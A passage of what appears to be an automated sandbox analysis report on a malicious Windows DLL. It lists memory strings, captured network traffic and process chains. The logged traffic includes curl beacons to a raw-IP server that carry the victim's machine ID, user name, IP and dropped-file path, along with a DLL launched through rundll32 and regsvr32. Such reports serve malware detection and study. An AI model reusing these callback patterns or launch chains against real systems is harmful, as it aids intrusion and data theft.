Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sat, 02 Oct 2021 16:14:13 GMTContent-Length: 9Connection: close

Source: WerFault.exe, 0000001A.00000002.367774999.000000000529F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: de-ch[1].htm.8.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.8.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.8.dr	String found in binary or memory: http://popup.taboola.com/german
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.6.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.6.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.6.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.6.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.6.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.6.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.6.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.6.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.8.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: auction[1].htm.8.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=gD768YcGIS_rT5aT_xpXNjS0H8tkjV.Nvhsms7rylRW_M.0i
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.8.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: https://contextualtag.media.net
Source: auction[1].htm.8.dr	String found in binary or memory: https://dcdn.adnxs.com/shftr/https%253A%252F%252Fcrcdn01.adnxs-simple.com%252Fcreative%252Fp%252F116
Source: auction[1].htm.8.dr	String found in binary or memory: https://fra1-ib.adnxs.com/click?ajUk7rH0yT_CBWlev_TFPwAAAADXowxAwgVpXr_0xT9qNSTusfTJP9fPZSQP3JQZhtAC
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.8.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.8.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=b3mvDC8GIS.jUCWNdVkGlgtY41ueuFbyEHKyWYSddewJ
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1633191194&rver=7.0.6730.0&am
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1633191195&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1633191194&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://marketing.outbrain.com/network/redir?p=v32QGHAgJSsc5iQUmc_8pzjvwpvCgGeqUtF8mqZlq22g-2MjMNlW2
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.8.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: auction[1].htm.8.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/Ykihn_T97HyKmYp1zmghmg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://secure.adnxs.com/clktrb?id=761754
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.8.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=59c0595395b644768e22501793011ec8&r=infopane&i=1&
Source: imagestore.dat.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOXRCw.img?h=368&
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: WerFault.exe, 0000001A.00000002.367329082.0000000005240000.00000004.00000001.sdmp	String found in binary or memory: https://watson.tel
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.8.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DFC2EE9AE5846D5CA6.TMP.6.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/vermischtes/20-j%c3%a4hriger-nach-attacke-auf-passanten-im-nie
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/der-regierungsrat-hat-%c3%bcberbordet-lehrer-und-e
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/die-gutschein-idee-des-bundes-polarisiert-ein-impf
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/interview-thomas-matter-wir-krampfen-und-die-linke
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/dachstock-von-wohnhaus-ist-vollst%c3%a4ndig-ausgebrannt/ar-AAP3
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/essen-im-zelt-und-zwischennutzung-im-lokal/ar-AAP4brs?ocid=hplo
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ich-finde-keine-ruhe-bis-er-begraben-ist/ar-AAP2O4C?ocid=hploca
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/in-schlieren-stand-ein-dachstock-in-flammen/ar-AAP3UEr?ocid=hpl
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/war-fr%c3%bcher-alles-besser-so-stehen-die-swiss-und-der-flugha
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/zwei-personen-nach-angriffen-im-niederdorf-verletzt/ar-AAP4mtE?
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.8.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.8.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.8.dr	String found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
Source: 52-478955-68ddb2ab[1].js.8.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: auction[1].htm.8.dr	String found in binary or memory: https://www.xandr.com/privacy/platform-privacy-policy

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: global traffic	HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lo/api/res/1.2/Ykihn_T97HyKmYp1zmghmg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1632726832621-2072.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: s.yimg.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F199655af051ff7c0f5750635e94a1c08.jpeg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb5bcb7af6a18196797e0801a99a8e259.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/5/file/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/0/Windows%2010%20x64/1108/185.32.222.18/818EAD17B250A7EF3FD678E8105C4E046AE985776F1D9E89478E18E60834AFFE/DpdFlLtjjDPF77r9pp7NDP/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/user/user/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5Cfree_LogicMonitorUQG4AO%5CgsDAQzQ6FyNsks.our/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/23/100019/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/DNSBL/not%20listed/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: 179.189.229.254
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.78.0Host: ipinfo.io

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.139:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.139:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 179.189.229.254:443 -> 192.168.2.5:49861 version: TLS 1.2

System Summary:

Source: DAQzQ6FyNs.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Source: DAQzQ6FyNs.dll	Virustotal: Detection: 11%
Source: DAQzQ6FyNs.dll	ReversingLabs: Detection: 15%

Source: DAQzQ6FyNs.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\DAQzQ6FyNs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\DAQzQ6FyNs.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5592 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\free_LogicMonitorUQG4AO\gsDAQzQ6FyNsks.our,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\DAQzQ6FyNs.dll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\DAQzQ6FyNs.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5592 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{DA86D2E2-6BC4-700C-FC9C-2214102619A2}
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{E39892E8-E128-0069-761B-01A524EDF8C4}
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{556AC42B-25CB-4511-7FD9-A707E946779B}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5468

Source: C:\Windows\System32\wermgr.exe

System information queried: HandleInformation

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{12F148CB-23E7-11EC-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA9BD1AE92B77E2D9.TMP

Jump to behavior

Source: classification engine

Classification label: mal80.evad.winDLL@27/126@18/10

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
